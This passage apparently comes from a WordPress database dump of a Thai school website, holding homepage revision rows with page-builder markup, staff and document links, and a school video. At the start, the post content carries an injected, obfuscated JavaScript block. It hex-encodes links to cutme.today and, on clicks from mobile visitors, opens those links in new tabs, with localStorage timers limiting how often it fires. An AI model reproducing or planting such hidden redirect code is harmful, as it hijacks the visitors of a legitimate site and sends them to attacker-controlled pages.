_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 13:33:59','2024-08-30 06:33:59','',19,'http://watprato.ssk.in.th/?p=336',0,'revision','',0),
(337,2,'2024-08-30 13:36:29','2024-08-30 06:36:29','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 